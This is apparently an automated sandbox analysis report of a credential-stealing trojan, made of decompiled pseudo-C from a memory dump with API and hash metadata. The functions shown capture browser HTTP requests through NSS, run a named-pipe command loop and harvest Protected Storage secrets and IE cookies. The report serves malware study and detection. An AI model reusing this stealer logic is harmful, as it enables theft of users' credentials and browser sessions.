    				char _v1152;
    				intOrPtr _v1164;
    				intOrPtr _v1172;
    				intOrPtr _v1180;
    				char _v1193;
    				void* __edi;
    				void* __esi;
    				signed int _t73;
    				intOrPtr _t84;
    				_Unknown_base(*)()* _t86;
    				void* _t87;
    				void* _t94;
    				void* _t96;
    				void* _t103;
    				signed int _t104;
    				_Unknown_base(*)()* _t113;
    				void* _t114;
    				void* _t117;
    				char* _t121;
    				void* _t128;
    				void* _t140;
    				intOrPtr _t144;
    				void* _t145;
    				void* _t147;
    				intOrPtr _t149;
    				signed int _t155;
    				void* _t157;
    
    				_t157 = (_t155 & 0xfffffff8) - 0x47c;
    				_t121 = _a8;
    				_t149 = _a4;
    				if(_t149 == 0 || _t121 == 0) {
    					L38:
    					_t73 =  *0x4169e0(_t149, _t121, _a12);
    					goto L39;
    				} else {
    					_t143 = _a12;
    					if(_a12 - 0x15 > 0x95ffe) {
    						goto L38;
    					}
    					_t124 = _t121;
    					if(E0040F131("GET ", _t121, 4) == 0) {
    						L5:
    						if(E0040F776(_t124, _t121, _t143, 2,  &_v1148) == 0 || _v1148 != 8 || E0040F131(_t78, "HTTP/1.", 7) != 0) {
    							goto L38;
    						} else {
    							_v1164 = E0040F776("HTTP/1.", _t121, _t143, 1,  &_v1144);
    							_v1172 = E0040F776("HTTP/1.", _t121, _t143, "Host",  &_v1152);
    							if(_v1180 == 0) {
    								goto L38;
    							}
    							_t84 = _v1144;
    							if(_t84 <= 0) {
    								goto L38;
    							}
    							_t144 = _v1136;
    							if(_t84 + _t144 > 0x3d4) {
    								goto L38;
    							}
    							_t86 =  *0x4169ec; // 0x0
    							if(_t86 != 0) {
    								L13:
    								_t87 =  *_t86( &_v1132);
    								_t128 = _t149;
    								if(_t87 != 0) {
    									goto L38;
    								}
    								asm("rol word [esp+0x22], 0x8");
    								E0040F173( &_v1100,  &_v1100, _t87, 0x444);
    								_v72 = E0040F776(_t128, _t121, _a12, "Referer",  &_v52);
    								_v96 = E0040F776(_t128, _t121, _a12, "Content-Type",  &_v76);
    								_v1193 = 0;
    								if( *((intOrPtr*)(_t149 + 0x14)) <= 0) {
    									L20:
    									_t94 = 7;
    									_push(_t94);
    									_push("http://");
    									L21:
    									_push( &_v1100);
    									_v88 = E0040F0FC();
    									if(_v1152 == 0 || _t144 <= 0) {
    										_push(_v1125 & 0x000000ff);
    										_push(_v1126 & 0x000000ff);
    										_push(_v1127 & 0x000000ff);
    										_push(_v1128 & 0x000000ff);
    										_push("%u.%u.%u.%u");
    										_t145 = 0x10;
    										_t96 = E0040F5E0(_t95, _t145, _t157 + _t95 + 0x58);
    										_t157 = _t157 + 0x14;
    										_v76 = _v76 + _t96;
    									} else {
    										E0040F0FC(_t157 + _t95 + 0x48, _v1140, _t144);
    										_v88 = _v88 + _t144;
    									}
    									if(_v1149 == 0) {
    										if(_v1130 == 0x50) {
    											goto L30;
    										}
    										goto L29;
    									} else {
    										if(_v1130 != 0x1bb) {
    											L29:
    											_push(_v1130 & 0x0000ffff);
    											_push(":%u");
    											_t147 = 7;
    											_v76 = _v76 + E0040F5E0(_v1130 & 0x0000ffff, _t147, _t157 + _v76 + 0x4c);
    											L30:
    											_t135 = _t157 + _v76 + 0x48;
    											_v88 = _v88 + E0040F0FC(_t157 + _v76 + 0x48, _v1148, _v1144);
    											if( *_t121 != 0x47) {
    												E0040F0FC( &_v84, "POST", 5);
    												_v72 = 4;
    												if(_v64 != 0 && _v48 > 0) {
    													_v52 = E0040F776(_t135, _t121, _a12, 3,  &_v32);
    												}
    											} else {
    												E0040F0FC( &_v84, "GET", 4);
    												_v72 = 3;
    											}
    											_v56 = E00404326(_t135) & 0xffffff00 | _t101 != 0x00000000;
    											_t103 = E0040C290(_t140,  &_v1100, _t101, 0);
    											_t104 = E0040F0C0(_t101);
    											if(_t103 != 0) {
    												_t149 = _a4;
    												_t121 = _a8;
    												goto L38;
    											} else {
    												_t73 = _t104 | 0xffffffff;
    												L39:
    												return _t73;
    											}
    										}
    										goto L30;
    									}
    								}
    								_t113 =  *0x4169e8; // 0x0
    								if(_t113 != 0) {
    									L17:
    									_t114 =  *_t113( *((intOrPtr*)(_t149 + 0x14)));
    									_t139 = _t114;
    									if(_t114 == 0 || E0040F131("NSS layer", _t139, 9) != 0) {
    										goto L20;
    									} else {
    										_t117 = 8;
    										_push(_t117);
    										_v1149 = 1;
    										_push("https://");
    										goto L21;
    									}
    								}
    								_t113 = GetProcAddress( *0x4169e4, "PR_GetNameForIdentity");
    								 *0x4169e8 = _t113;
    								if(_t113 == 0) {
    									goto L20;
    								}
    								goto L17;
    							}
    							_t86 = GetProcAddress( *0x4169e4, "PR_GetPeerName");
    							 *0x4169ec = _t86;
    							if(_t86 == 0) {
    								goto L38;
    							}
    							goto L13;
    						}
    					}
    					_t124 = _t121;
    					if(E0040F131("POST ", _t121, 5) != 0) {
    						goto L38;
    					}
    					goto L5;
    				}
    			}

    APIs
    • GetProcAddress.KERNELBASE(PR_GetPeerName,?), ref: 00406DCE
    • GetProcAddress.KERNELBASE(PR_GetNameForIdentity,?), ref: 00406E62
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc
    • String ID: %u.%u.%u.%u$:%u$Content-Type$GET$GET $HTTP/1.$Host$NSS layer$P$POST$POST $PR_GetNameForIdentity$PR_GetPeerName$Referer$http://$https://
    • API String ID: 190572456-492401960
    • Opcode ID: 59a1b8618d7fe85ff5050732f71d4bd05903e40b059016dc8ac23c37b7ac1504
    • Instruction ID: cd41821a1ffcb6a837b3746b6c584dd423b21d578121063254a3413d32c58231
    • Opcode Fuzzy Hash: 59a1b8618d7fe85ff5050732f71d4bd05903e40b059016dc8ac23c37b7ac1504
    • Instruction Fuzzy Hash: EC91B1B1608381ABD7309F65DC45B6B77E8AB84308F00493FB685B61D1E778E918876F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040B0A9(void _a4) {
    				long _v8;
    				void _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				void _t59;
    				void* _t71;
    				long _t75;
    				void** _t81;
    
    				_t81 = _a4;
    				_v20 = CreateMutexW(0x417680, 0, _t81[4]);
    				SetEvent(_t81[2]);
    				DisconnectNamedPipe( *_t81);
    				if(WaitForSingleObject(_t81[1], 0) != 0) {
    					_t75 = 4;
    					do {
    						if(ConnectNamedPipe( *_t81, 0) == 1) {
    							_v12 = 0;
    							_v8 = 0;
    							_v16 = 0;
    							_a4 = 0;
    							if(ReadFile( *_t81,  &_v12, _t75,  &_v8, 0) != 0 && _v8 == _t75 && ReadFile( *_t81,  &_a4, _t75,  &_v8, 0) != 0 && _v8 == _t75) {
    								_t59 = _a4;
    								if(_t59 > 0xa00000) {
    									_t59 = 0;
    									_a4 = 0;
    								}
    								if(_t59 <= 0) {
    									L13:
    									_v12 = _t81[3]( &_a4);
    									WriteFile( *_t81,  &_v12, _t75,  &_v8, 0);
    									if(_a4 > 0xa00000) {
    										_a4 = 0;
    									}
    									WriteFile( *_t81,  &_a4, _t75,  &_v8, 0);
    									if(_a4 != 0) {
    										WriteFile( *_t81, _v16, _a4,  &_v8, 0);
    									}
    									FlushFileBuffers( *_t81);
    								} else {
    									_t71 = E0040F0A8(_t59);
    									_v16 = _t71;
    									if(_t71 != 0 && ReadFile( *_t81, _t71, _a4,  &_v8, 0) != 0 && _v8 == _a4) {
    										goto L13;
    									}
    								}
    							}
    							E0040F0C0(_v16);
    							DisconnectNamedPipe( *_t81);
    						}
    					} while (WaitForSingleObject(_t81[1], 0) != 0);
    				}
    				CloseHandle(_v20);
    				SetEvent(_t81[2]);
    				_push(0);
    				return RtlExitUserThread();
    			}

    APIs
    • CreateMutexW.KERNEL32(00417680,00000000,?), ref: 0040B0BF
    • SetEvent.KERNEL32(?), ref: 0040B0CB
    • DisconnectNamedPipe.KERNEL32(?), ref: 0040B0D3
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B0DD
    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0040B0F2
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040B119
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040B13C
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040B17D
    • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040B1AB
    • WriteFile.KERNEL32(?,00A00000,00000004,?,00000000), ref: 0040B1C9
    • WriteFile.KERNEL32(?,?,00A00000,?,00000000), ref: 0040B1E1
    • FlushFileBuffers.KERNEL32(?), ref: 0040B1E9
    • DisconnectNamedPipe.KERNEL32(?,?), ref: 0040B1F9
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B203
    • CloseHandle.KERNEL32(?), ref: 0040B215
    • SetEvent.KERNEL32(?), ref: 0040B21E
    • RtlExitUserThread.NTDLL(00000000), ref: 0040B225
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$NamedPipeReadWrite$DisconnectEventObjectSingleWait$BuffersCloseConnectCreateExitFlushHandleMutexThreadUser
    • String ID:
    • API String ID: 1315446275-0
    • Opcode ID: bcbed62debb83a4ae83eefff702aa1cf653722968e9c94ca2f7a0362f8bedbab
    • Instruction ID: a43f95dd44fd58cc713da7751d4df5839c480342773b17c23f9f6c0b76a3511f
    • Opcode Fuzzy Hash: bcbed62debb83a4ae83eefff702aa1cf653722968e9c94ca2f7a0362f8bedbab
    • Instruction Fuzzy Hash: 1C513676900108FFDB219F90EC48DEEBBB9EF48380B11847AF956E6164DB319A41DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040A90D() {
    				char _v12;
    				HANDLE* _v48;
    				long _v52;
    				void _v64;
    				void* __esi;
    				void* _t23;
    				intOrPtr _t28;
    				intOrPtr _t35;
    				intOrPtr _t37;
    				void* _t42;
    				void* _t47;
    				void* _t48;
    				void* _t50;
    				intOrPtr _t61;
    				intOrPtr _t63;
    				intOrPtr _t64;
    
    				E0040F173( &_v12,  &_v12, 0, 8);
    				L004042E5();
    				E00414B7A();
    				E004082DF();
    				 *0x416fe4(0x4169f0, _t47, _t50, _t42);
    				E0041208C();
    				E0040F173(SetThreadPriority(GetCurrentThread(), 2), 0x416a88, 0, 0x10);
    				 *0x416a8c = CreateEventW(0, 1, 0, 0);
    				E00414B37();
    				_t23 = InternetOpenA( *0x4176a0, 0, 0, 0, 0);
    				 *0x416a90 = _t23;
    				_v64 = 0xea60;
    				InternetSetOptionA(_t23, 2,  &_v64, 4);
    				E0040B826(0);
    				E00407518(0x4161c4,  &_v64, 0,  *0x416e28, 0xffffffff);
    				_t28 =  *0x416c34; // 0x25df5a8
    				_t4 = _t28 + 0x28; // 0x25df8e0
    				_t48 = E0040B231( &_v64, 0, E0040A79B,  *_t4);
    				 *0x416796 = 0;
    				 *0x416a88 = 0;
    				L1:
    				if(WaitForSingleObject( *0x416a8c, 0x14) == 0) {
    					 *0x416a88 = 1;
    				}
    				_t61 =  *0x416a88; // 0x0
    				if(_t61 != 0) {
    					goto L9;
    				}
    				_t37 =  *0x416c34; // 0x25df5a8
    				_t5 = _t37 + 0x30; // 0x25df930
    				if(E0040B355( *_t5) != 0) {
    					goto L1;
    				} else {
    					_t63 =  *0x416a88; // 0x0
    					if(_t63 == 0) {
    						E0040A7DD( &_v52);
    						WaitForSingleObject( *0x416a8c, 0xffffffff);
    						while(1) {
    							_t64 =  *0x416a88; // 0x0
    							if(_t64 <= 0) {
    								goto L9;
    							}
    							Sleep(0x14);
    						}
    					}
    				}
    				L9:
    				WaitForMultipleObjects(_v52, _v48, 1, 0xffffffff);
    				E004121D7( &_v52);
    				CloseHandle( *0x416a8c);
    				InternetCloseHandle( *0x416a90);
    				_t35 =  *0x416c34; // 0x25df5a8
    				_t10 = _t35 + 0x28; // 0x25df8e0
    				return E0040B300(_t48,  *_t10);
    			}

    0x0040a923
    0x0040a928
    0x0040a92d
    0x0040a932
    0x0040a93c
    0x0040a942
    0x0040a95e
    0x0040a970
    0x0040a975
    0x0040a984
    0x0040a994
    0x0040a999
    0x0040a9a1
    0x0040a9a9
    0x0040a9bb
    0x0040a9c0
    0x0040a9c5
    0x0040a9d2
    0x0040a9d4
    0x0040a9da
    0x00000000
    0x0040a9e0
    0x0040a9f0
    0x0040a9f2
    0x0040a9f2
    0x0040a9f8
    0x0040a9fe
    0x00000000
    0x00000000
    0x0040aa00
    0x0040aa05
    0x0040aa0f
    0x00000000
    0x0040aa11
    0x0040aa11
    0x0040aa17
    0x0040aa1e
    0x0040aa2b
    0x0040aa3b
    0x0040aa3b
    0x0040aa41
    0x00000000
    0x00000000
    0x0040aa35
    0x0040aa35
    0x0040aa3b
    0x0040aa17
    0x0040aa43
    0x0040aa4e
    0x0040aa58
    0x0040aa63
    0x0040aa6f
    0x0040aa75
    0x0040aa7a
    0x0040aa8a

    APIs
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(?,025DF5A8,025DF770,00000000), ref: 00414BA1
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(00417478,00417478,?), ref: 00414BB0
    • RtlInitializeCriticalSection.NTDLL(004169F0), ref: 0040A93C
    • GetCurrentThread.KERNEL32 ref: 0040A949
    • SetThreadPriority.KERNEL32(00000000), ref: 0040A950
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00416A88,00000000,00000010), ref: 0040A96A
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040A984
    • InternetSetOptionA.WININET ref: 0040A9A1
      • Part of subcall function 0040B826: CharLowerBuffA.USER32(00000000,00000031,?,-80000002,025DF9A0,025DF870,00000001,?,00000002), ref: 0040B959
    • WaitForSingleObject.KERNEL32(00000014,0040A79B,025DF8E0,000000FF), ref: 0040A9E8
    • WaitForSingleObject.KERNEL32(000000FF,025DF930), ref: 0040AA2B
    • Sleep.KERNEL32(00000014), ref: 0040AA35
    • WaitForMultipleObjects.KERNEL32(0000EA60,0000EA60,00000001,000000FF), ref: 0040AA4E
    • CloseHandle.KERNEL32 ref: 0040AA63
    • InternetCloseHandle.WININET ref: 0040AA6F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InternetWait$CloseCombineHandleObjectPathSingleThread$BuffCharCreateCriticalCurrentEventInitializeLowerMultipleObjectsOpenOptionPrioritySectionSleep
    • String ID: `
    • API String ID: 1774169687-1850852036
    • Opcode ID: e771aee4983f8c44a5ce70beee52ba52a4e7459caebc41cb25a7d5c13b928f2c
    • Instruction ID: a1826f101b3d188991e062ca2f9a02fdd68f73e14a91bc899c14a59b73f0d7f6
    • Opcode Fuzzy Hash: e771aee4983f8c44a5ce70beee52ba52a4e7459caebc41cb25a7d5c13b928f2c
    • Instruction Fuzzy Hash: F041CC71144300AFC710BFA1ED49EDA3A68EB053A9B12C23AF214A25F1CB34C850DB6E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040683F(void* __eflags) {
    				intOrPtr _v12;
    				intOrPtr _v20;
    				void* __ecx;
    				void* __esi;
    				intOrPtr _t23;
    				WCHAR* _t27;
    				void* _t28;
    				WCHAR* _t29;
    				void* _t30;
    				intOrPtr _t31;
    				intOrPtr _t33;
    				void* _t34;
    				intOrPtr _t35;
    				long _t38;
    				intOrPtr _t39;
    				intOrPtr _t41;
    				intOrPtr _t47;
    				signed int _t49;
    				intOrPtr _t57;
    				intOrPtr _t59;
    				intOrPtr _t61;
    				void* _t64;
    				intOrPtr _t65;
    				void* _t68;
    				void* _t70;
    
    				E004082DF();
    				 *0x4167c8 = CreateEventW(0, 1, 0, 0);
    				E0040B770(0x4167d0);
    				_t23 =  *0x416c34; // 0x25df5a8
    				_t1 = _t23 + 0xc; // 0x25df7b0
    				PathCombineW(0x4167d0, 0x4167d0,  *_t1);
    				 *0x4169d8 = CreateFileW(0x4167d0, 0x80000000, 0, 0, 3, 0, 0);
    				E0040BC40();
    				_t27 = L004042E5();
    				 *0x4167c0 = _t27;
    				_t28 = CreateFileW(_t27, 0x80000000, 0, 0, 4, 0, 0);
    				 *0x4167cc = _t28;
    				if(_t28 == 0xffffffff) {
    					 *0x4167cc = 0;
    				}
    				_t29 = E00414B7A();
    				 *0x4167c4 = _t29;
    				_t30 = CreateFileW(_t29, 0x80000000, 0, 0, 4, 0, 0);
    				 *0x4169dc = _t30;
    				_t73 = _t30 - 0xffffffff;
    				if(_t30 == 0xffffffff) {
    					 *0x4169dc = 0;
    				}
    				_t31 =  *0x416c34; // 0x25df5a8
    				_t2 = _t31 + 0x2c; // 0x25df908
    				_v20 = E0040B231(_t64, _t73, E004066BC,  *_t2);
    				_t33 =  *0x416c34; // 0x25df5a8
    				_t4 = _t33 + 0x28; // 0x25df8e0
    				_t34 = E0040B355( *_t4);
    				_t74 = _t34;
    				if(_t34 != 0) {
    					_t59 =  *0x416c34; // 0x25df5a8
    					_t5 = _t59 + 0x28; // 0x25df8e0
    					E0040B37A(_t74,  *_t5, 3, 0, 0, 0, 0);
    					while(1) {
    						_t61 =  *0x416c34; // 0x25df5a8
    						_t6 = _t61 + 0x28; // 0x25df8e0
    						if(E0040B355( *_t6) == 0) {
    							goto L8;
    						}
    						Sleep(0x14);
    					}
    				}
    				L8:
    				_t70 = E0040AA9C;
    				do {
    					_t35 =  *0x416c34; // 0x25df5a8
    					_t7 = _t35 + 0x28; // 0x25df8e0
    					if(E0040B355( *_t7) == 0) {
    						_t65 =  *0x416c34; // 0x25df5a8
    						_t49 = 0;
    						_t68 = E0040BA69( *((intOrPtr*)(_t65 + ((_t49 & 0xffffff00 | ( *0x416cd0 & 0x00000001) != 0x00000000) + 5) * 4)));
    						while(E00407873(0, _t65, _t70 -  *0x416d84, _t68) == 0) {
    							Sleep(0x14);
    						}
    						while(1) {
    							_t57 =  *0x416c34; // 0x25df5a8
    							_t14 = _t57 + 0x28; // 0x25df8e0
    							if(E0040B355( *_t14) != 0) {
    								goto L16;
    							}
    							Sleep(0x14);
    						}
    					}
    					L16:
    					E0040BC89(0x4167d0);
    					Sleep(0x64);
    					_t38 = WaitForSingleObject( *0x4167c8, 0x32);
    					_t80 = _t38;
    				} while (_t38 != 0);
    				_t39 =  *0x416c34; // 0x25df5a8
    				_t15 = _t39 + 0x28; // 0x25df8e0
    				E0040B37A(_t80,  *_t15, 3, 0, 0, 0, 0);
    				while(1) {
    					_t41 =  *0x416c34; // 0x25df5a8
    					_t16 = _t41 + 0x28; // 0x25df8e0
    					if(E0040B355( *_t16) == 0) {
    						break;
    					}
    					Sleep(0x14);
    				}
    				CloseHandle( *0x4167c8);
    				CloseHandle( *0x4167cc);
    				CloseHandle( *0x4169dc);
    				CloseHandle( *0x4169d8);
    				_t47 =  *0x416c34; // 0x25df5a8
    				_t17 = _t47 + 0x2c; // 0x25df908
    				return E0040B300(_v12,  *_t17);
    			}

    0x00406844
    0x00406856
    0x00406862
    0x00406867
    0x0040686c
    0x00406871
    0x0040688a
    0x0040688f
    0x00406894
    0x004068a1
    0x004068a6
    0x004068ac
    0x004068b4
    0x004068b6
    0x004068b6
    0x004068bc
    0x004068c9
    0x004068ce
    0x004068d4
    0x004068d9
    0x004068dc
    0x004068de
    0x004068de
    0x004068e4
    0x004068e9
    0x004068f6
    0x004068fa
    0x004068ff
    0x00406902
    0x00406907
    0x00406909
    0x0040690b
    0x00406916
    0x00406919
    0x00406928
    0x00406928
    0x0040692d
    0x00406937
    0x00000000
    0x00000000
    0x00406922
    0x00406922
    0x00406928
    0x00406939
    0x00406939
    0x0040693e
    0x0040693e
    0x00406943
    0x0040694d
    0x00406956
    0x0040695e
    0x0040696d
    0x00406979
    0x00406973
    0x00406973
    0x00406998
    0x00406998
    0x0040699d
    0x004069a7
    0x00000000
    0x00000000
    0x00406992
    0x00406992
    0x00406998
    0x004069a9
    0x004069aa
    0x004069b1
    0x004069bf
    0x004069c5
    0x004069c5
    0x004069cd
    0x004069d8
    0x004069db
    0x004069ea
    0x004069ea
    0x004069ef
    0x004069f9
    0x00000000
    0x00000000
    0x004069e4
    0x004069e4
    0x00406a01
    0x00406a0d
    0x00406a19
    0x00406a25
    0x00406a2b
    0x00406a30
    0x00406a41

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406850
      • Part of subcall function 0040B770: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    • PathCombineW.SHLWAPI(004167D0,004167D0,025DF7B0), ref: 00406871
    • CreateFileW.KERNEL32(004167D0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00406884
      • Part of subcall function 0040BC40: PathCombineW.SHLWAPI(?,?,025DF5A8), ref: 0040BC63
      • Part of subcall function 0040BC40: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040BC72
      • Part of subcall function 0040BC40: SetFileAttributesW.KERNEL32(?,00000006), ref: 0040BC81
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 004068A6
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 004068CE
    • Sleep.KERNEL32(00000014,025DF8E0,025DF8E0,00000003,00000000,00000000,00000000,00000000,025DF8E0,Function_000066BC,025DF908), ref: 00406922
    • Sleep.KERNEL32(00000014,-0000C2E8,00000000,025DF5A8,025DF8E0,025DF8E0,Function_000066BC,025DF908), ref: 00406973
    • Sleep.KERNEL32(00000014,025DF8E0,-0000C2E8,00000000), ref: 00406992
    • Sleep.KERNEL32(00000064,004167D0,025DF8E0,025DF8E0,Function_000066BC,025DF908), ref: 004069B1
    • WaitForSingleObject.KERNEL32(00000032), ref: 004069BF
    • Sleep.KERNEL32(00000014,025DF8E0,025DF8E0,00000003,00000000,00000000,00000000,00000000), ref: 004069E4
      • Part of subcall function 0040B300: SetEvent.KERNEL32(?,00000000,0040AA84,025DF8E0), ref: 0040B30A
      • Part of subcall function 0040B300: WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040B323
      • Part of subcall function 0040B300: CloseHandle.KERNEL32(00000000), ref: 0040B32B
      • Part of subcall function 0040B300: CloseHandle.KERNEL32(?), ref: 0040B334
      • Part of subcall function 0040B300: CloseHandle.KERNEL32(?), ref: 0040B33D
    • CloseHandle.KERNEL32(025DF8E0), ref: 00406A01
    • CloseHandle.KERNEL32 ref: 00406A0D
    • CloseHandle.KERNEL32 ref: 00406A19
    • CloseHandle.KERNEL32 ref: 00406A25
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateSleep$File$Path$CombineEventObjectSingleWait$AttributesDirectoryFolderSpecial
    • String ID:
    • API String ID: 4283066563-0
    • Opcode ID: 3ea9ad353ccd514ac0e9652666e678f886fe664f8563c83084baa964af4f711d
    • Instruction ID: c1f1752dcda3a5e67e585e269ea24b289866ac7704f654a8e7158adc096548e9
    • Opcode Fuzzy Hash: 3ea9ad353ccd514ac0e9652666e678f886fe664f8563c83084baa964af4f711d
    • Instruction Fuzzy Hash: 03517CB5101250AFC620AF66EE09F873B79EB89714B13813AF601A72F1CB75C811DB6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E004051FC() {
    				int _v24;
    				int _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v68;
    				char _v72;
    				int _v76;
    				intOrPtr _v80;
    				char _v84;
    				char _v88;
    				int _v92;
    				char _v100;
    				void* _v104;
    				char _v108;
    				intOrPtr* _v116;
    				intOrPtr* _v128;
    				intOrPtr* _v132;
    				char _v136;
    				intOrPtr* _v144;
    				char _v148;
    				char _v164;
    				intOrPtr* _v168;
    				intOrPtr* _v172;
    				char _v180;
    				intOrPtr* _v188;
    				char _v196;
    				int _v204;
    				char _v208;
    				WCHAR* _v212;
    				intOrPtr _v216;
    				char _v224;
    				short _v232;
    				int _v236;
    				intOrPtr _v240;
    				short _v244;
    				short* _v252;
    				short _v256;
    				char* _v260;
    				short _v264;
    				intOrPtr _v272;
    				void* __edi;
    				_Unknown_base(*)()* _t123;
    				intOrPtr _t126;
    				intOrPtr _t133;
    				intOrPtr* _t140;
    				intOrPtr* _t142;
    				intOrPtr* _t144;
    				intOrPtr* _t146;
    				short _t147;
    				intOrPtr* _t148;
    				short _t149;
    				intOrPtr* _t150;
    				short _t151;
    				intOrPtr* _t152;
    				short _t153;
    				WCHAR* _t155;
    				short _t156;
    				char* _t161;
    				int _t162;
    				short _t165;
    				char* _t167;
    				signed char _t178;
    				signed int _t179;
    				short* _t181;
    				intOrPtr* _t183;
    				intOrPtr* _t185;
    				intOrPtr* _t187;
    				short _t200;
    				char _t203;
    				short _t221;
    				short _t227;
    				void* _t228;
    				void* _t229;
    				short* _t230;
    				short _t233;
    				short _t235;
    
    				_t123 = GetProcAddress(LoadLibraryA("pstorec.dll"), "PStoreCreateInstance");
    				_t233 = 0;
    				_v84 = 0;
    				_v36 = 0x10;
    				_v32 = 2;
    				_v28 = 0;
    				_v24 = 0;
    				_v92 = 0;
    				_v76 = 0;
    				if(_t123 == 0) {
    					L45:
    					_v68 = 0;
    					_v72 = 0;
    					if(E004050A3(_t192,  &_v72, 1,  &_v68) != 0) {
    						_t226 = _v72;
    						if(_v72 > 0) {
    							_t133 = E0040F074(_t226 + _t233 + 0x32, _v92);
    							if(_t133 != 0) {
    								_v92 = _t133;
    								E0040F0FC(E0040F0FC(_t133 + _t233, "\nIE Cookies:\n", 0xd) + 0xd, _v80, _t226);
    							}
    							E0040F0C0(_v68);
    						}
    					}
    					_t126 = _v92;
    					_t249 = _v92;
    					if(_v92 == 0) {
    						_t126 = "Empty";
    					}
    					E0041540F(_t192, _t208, _t249, 1, 0, 0, L"Protected Storage:\n\n%S", _t126);
    					E0040F0C0(_v92);
    					E004050A3(_t192, 0, 0, 0);
    					E004055B9(1);
    					return 1;
    				}
    				_push(0);
    				_push(0);
    				_push(0);
    				_t192 =  &_v84;
    				_push( &_v84);
    				if( *_t123() != 0) {
    					goto L45;
    				}
    				_t140 = _v100;
    				if(_t140 == 0) {
    					goto L45;
    				}
    				_t208 =  &_v72;
    				_push( &_v72);
    				_push(0);
    				_push(0);
    				_push(_t140);
    				if( *((intOrPtr*)( *_t140 + 0x38))() != 0) {
    					L44:
    					_t142 = _v116;
    					_t192 =  *_t142;
    					 *((intOrPtr*)( *_t142 + 8))(_t142);
    					goto L45;
    				} else {
    					while(1) {
    						_t144 = _v88;
    						_push(0);
    						_t208 =  &_v84;
    						_push( &_v84);
    						_push(1);
    						_push(_t144);
    						if( *((intOrPtr*)( *_t144 + 0xc))() != 0) {
    							break;
    						}
    						__eflags = _v100 - 0xe161255a;
    						if(_v100 != 0xe161255a) {
    							continue;
    						}
    						_t146 = _v132;
    						_t147 =  *((intOrPtr*)( *_t146 + 0x3c))(_t146, 0,  &_v100, 0,  &_v108);
    						__eflags = _t147;
    						if(_t147 != 0) {
    							continue;
    						}
    						while(1) {
    							_t148 = _v128;
    							_t149 =  *((intOrPtr*)( *_t148 + 0xc))(_t148, 1,  &_v88, 0);
    							__eflags = _t149;
    							if(_t149 != 0) {
    								break;
    							}
    							_t150 = _v168;
    							_t151 =  *((intOrPtr*)( *_t150 + 0x54))(_t150, 0,  &_v136,  &_v104, 0,  &_v148);
    							__eflags = _t151;
    							if(_t151 != 0) {
    								continue;
    							}
    							_v188 = 0;
    							_v204 = 0;
    							while(1) {
    								_t152 = _v172;
    								_t153 =  *((intOrPtr*)( *_t152 + 0xc))(_t152, 1,  &_v196, 0);
    								__eflags = _t153;
    								if(_t153 != 0) {
    									break;
    								}
    								_t227 = StrStrW(_v212, L":StringData");
    								__eflags = _t227;
    								if(_t227 == 0) {
    									continue;
    								}
    								__eflags =  *(_t227 + 0x16);
    								if( *(_t227 + 0x16) != 0) {
    									continue;
    								}
    								__eflags = _t227 - _v216;
    								if(_t227 == _v216) {
    									continue;
    								}
    								_t155 = _v212;
    								_t156 =  *((intOrPtr*)( *_t155 + 0x44))(_t155, 0,  &_v180,  &_v148, _v216,  &_v208,  &_v224,  &_v164, 0x10);
    								__eflags = _t156;
    								if(_t156 != 0) {
    									continue;
    								}
    								_t157 = _v244;
    								__eflags = _v244 - 2;
    								if(_v244 <= 2) {
    									continue;
    								}
    								_t221 = E0040F0A8(_t157);
    								_v232 = _t221;
    								__eflags = _t221;
    								if(_t221 == 0) {
    									continue;
    								}
    								 *_t227 = 0;
    								_t200 = _v244;
    								_t161 =  &(_v260[_t200]);
    								_t235 = 0;
    								_t228 = 0;
    								__eflags =  *(_t161 - 1);
    								if( *(_t161 - 1) != 0) {
    									L28:
    									__eflags = _t200;
    									if(_t200 <= 0) {
    										L33:
    										__eflags =  *((char*)(_t235 + _t221 - 1)) - 0x7c;
    										if( *((char*)(_t235 + _t221 - 1)) == 0x7c) {
    											_t235 = _t235 - 1;
    											__eflags = _t235;
    										}
    										_t162 = E0040F533(_v252);
    										_v236 = _t162;
    										_t229 = _t162 + _t235 + _v240;
    										_t60 = _t229 + 6; // 0x6
    										_t165 = E0040F074(_t60, _v256);
    										_v264 = _t165;
    										__eflags = _t165;
    										if(_t165 != 0) {
    											_v256 = _t165;
    											_t167 = _t165 + _v240;
    											_v260 = _t167;
    											WideCharToMultiByte(0, 0, _v252, _v236, _t167, _v236, 0, 0);
